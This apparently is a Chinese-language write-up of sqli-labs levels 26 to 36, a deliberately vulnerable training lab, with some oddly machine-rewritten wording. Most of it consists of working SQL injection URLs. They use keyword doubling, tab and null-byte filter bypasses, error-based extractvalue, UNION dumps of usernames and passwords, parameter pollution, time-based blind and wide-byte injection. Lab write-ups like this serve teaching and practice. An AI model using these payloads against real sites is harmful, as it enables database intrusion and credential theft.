该关卡提示空格和注释被转义,我们测试一下:
http://www.sqli.com/Less-26/?id=1’报错
sqli-labs-master/Less-26/?id=1’ --+ 依旧报错,
我添加的注释不见了,该当是注释被转义成了空字符,我们换成;%00测试一下:
http://www.sqli.com/Less-26/?id=1%20and%20sleep(4);%00
and该当被转义了 phpstorm 抓一下包看看
除了用;%00绕过,我们还可以利用id=1’ or ‘1’=’1进行绕过,但是要把稳该关卡的or和空格都进行了转义,空格可以利用编码%0A代替,但是在Windows phpstudy环境下,空缺字符编码无效,以是我们无法利用空格。
由于无法利用空格,因此http://127.0.0.1/sqli-labs-master/Less-26/?id=1’ (oorrder by 4);%00这种语句都无法利用,我们利用报错注入:
更换:如 and 可更换为 && ,or 可更换为 ||获取当前数据库
select from users where id='1' union (select(extractvalue(1,concat(0x7e,database()))));%00
获取所有数据库:
但是这里长度有限定,无法全部取出
http://127.0.0.1/sqli-labs-master/Less-26/?id=1’ || (select (extractvalue(1,concat(0x7e,(select (group_concat(schema_name)) from (infoorrmation_schema.schemata) )))));%00
获取security库中的表:
select from users where id='1' || (select (extractvalue(1,concat(0x7e,(select (group_concat(table_name)) from (infoorrmation_schema.tables) where (table_schema=0x7365637572697479))))));%00
获取users库中字段:
select from users where id='1' || (select (extractvalue(1,concat(0x7e,(select (group_concat(column_name)) from (infoorrmation_schema.columns) where ((table_schema=0x7365637572697479) aandnd (table_name=0x7573657273)))))));%00 把稳and也须要双写:
获取username和password字段的信息:
把稳password中or须要双写,由于长度限定,利用group_concat()函数无法取出全部数据,而且空格被转义,所有limit函数也无法利用,因此我们利用where(id=1)来定位数据,这样可以取出全部数据。
sqli-labs-master/Less-26/?id=1’ || (select (extractvalue(1,concat(0x7e,(select (concat(username,0x7e,passwoorrd)) from (security.users) where (id=1))))));%00
sqli-labs————Less-27(union and等)
提示彷佛是 union and b被过滤了
确定注入参数值类型,
id=1’报错 过滤了 1=1 1=2 没有报错
根据报错信息确定参数值类型为字符型
是否过滤空格,也是过滤
果真过滤union关键字
select也是过滤的,但是大小写可以打破的
PHPSTORM抓包看一下
有马脚 可以大小绕过
空格可以利用编码%0A代替,但是在Windows phpstudy环境下,空缺字符编码无效,以是我们无法利用空格。
但是大小写可以打破的 空格%09绕过 ;%00带掉
回显显示为为3
http://www.sqli.com/less-27/?id=-1%27%09uNion%09seLect%091,2,3;%00
http://www.sqli.com/less-27/?id=-1%27%09oRder%09by%094;%00
获取当前数据库名顺便获取当前用户名
列出(数据库:security)中所有的表
http://www.sqli.com/less-27/?id=id=-1%27%09uNion%09seLect%091,group_concat(table_name),3%09from%09information_schema.tables%09where%09table_schema=%27security%27;%00
列出(数据库:security 表:users )中所有的字段
www.sqli.com/less-27/?id=id=-1%27%09uNion%09seLect%091,group_concat(column_name),3%09from%09information_schema.columns%09where%09table_schema=%27security%27and%09table_name=%27users%27;%00
列出(表:users )中第一段结果
www.sqli.com/less-27/?id=id=-1%27%09uNion%09seLect%091,group_concat(concat_ws(0x7e,username,password)),3%09from%09security.users;%00
http://www.sqli.com/less-27/?id=0%27%09uNion%09seLect%091,group_concat(concat_ws(0x7e,username,password)),3%09from%09security.users;%00&XDEBUG_SESSION_START=PHPSTORM
sqli-labs————Less-28()
老规矩先判断
http://www.sqli.com/Less-28/?id=1’ 先来个单引号看看 果真报错 存在注入
然后双引号,看报错,预测下语句里面用的是什么这里我用单引号报错了,然而双引号没有报错
后面可能便是 select from users where id=('xxx')
闭合成功 -1%27)%09aNd%09Sleep(10);%00
PHPSTORM抓包看一下
获取当前数据库名顺便获取当前用户名
这里就利用bool/time型注入,则注入得到当前用户的第一个字符
是r 预测是root
http://www.sqli.com/Less-28/?id=0%27)union(select(1),user(),3);%00
http://www.sqli.com/Less-28/?id=0%27)union(select(1),user(),3);%00
后面就大略了
sqli-labs————Less-29()
看下页面,(这个网站受到天下最好的防火墙保护)
老规矩先判断
输入一个引号发生缺点,两个引号正常
觉得是一个数字型
然后输入(,看会不会报错
sql/Less-28a/?id=1)''
后面单引号是闭合原来语句的单引号,加上)没错,解释原来的语句有括号
语句可能便是 select from users where id=’1’
查看源代码
根据网上教程说是双做事器
验证一下结果如下
http://www.sqli.com/less-29/?id=1%27union%20select%201,2,3--+
据报错提示可以布局闭合了'--+,看看是否存在联合查询注入,布局http://localhost:8080/sqli-labs/Less-29/?id=1&id=0%27union%20select%201,2,3--+,回显如下,解释存在,接下来的操作和以前的单做事器一样了
获取当前的数据库用户名
http://www.sqli.com/less-29/?id=1&id=0%27union%20select%201,user(),3--+
http://www.sqli.com/less-29/?id=1&id=0%27union%20select%201,database(),3--+
列出当前的数据库以是表
http://www.sqli.com/less-29/?id=1&id=0%27union%20select%201,group_concat(table_name),3%09from%09information_schema.tables%09where%09table_schema=%27security%27;%00
列出(数据库:security 表:users )中所有的字段
列出(表:users )中第一段结果
sqli-labs————Less-30()
老规矩上来单引号 觉得和29差不多
双引号缺点 可以猜猜对面可能是 select from users where id="1"
进一步验证
http://www.sqli.com/less-30/?id=1&id=0&id=0%22union%20select%201,group_concat(concat_ws(0x7e,username,password)),3%09from%09security.users;%00
sqli-labs————Less-35()
id=’ 报错 id=’’ 报错
库
表
http://www.sqli.com/less-35/?id=-1%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=0x7365637572697479%20--+
字段
http://www.sqli.com/less-35/?id=-1%20union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=0x7573657273%20--%20+
users 密码
http://www.sqli.com/less-35/?id=-1%20union%20select%201,2,group_concat(concat_ws(0x7e,username,password))%20from%20security.users%20--+
方法二(韶光盲注)
判断当前库名称长度
http://www.web.com/sql/Less-35/?id=1 and if(length(database())=,1,sleep(2))–+
没有延时并返回精确则解释精确,有延时则解释缺点
判断当前数据库首字母(0x73是s的十六进制)
http://www.web.com/sql/Less-35/?id=1 and if(substr((select database()),1,1)=0x73,1,sleep(2))–+
没有延时并返回精确则解释精确,有延时则解释缺点
sqli-labs————Less-36()
查找注入点http://www.web.com/sql/Less-36/?id=1’提示显示被转义 ok
-1%df%27union%20select%201,database(),3%20--%201
注入点
源码被转义了
http://www.sqli.com/less-36/?id=-1%df%27union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=0x7365637572697479%20--%201
users 密码
http://www.sqli.com/less-36/?id=-1%fd%27union%20select%201,2,group_concat(concat_ws(0x7e,username,password))%20from%20security.users%20--+
判断当前库名称长度
http://www.web.com/sql/Less-35/?id=1%df’ and if(length(database())=,1,sleep(2))–+
sqli-labs————Less-37()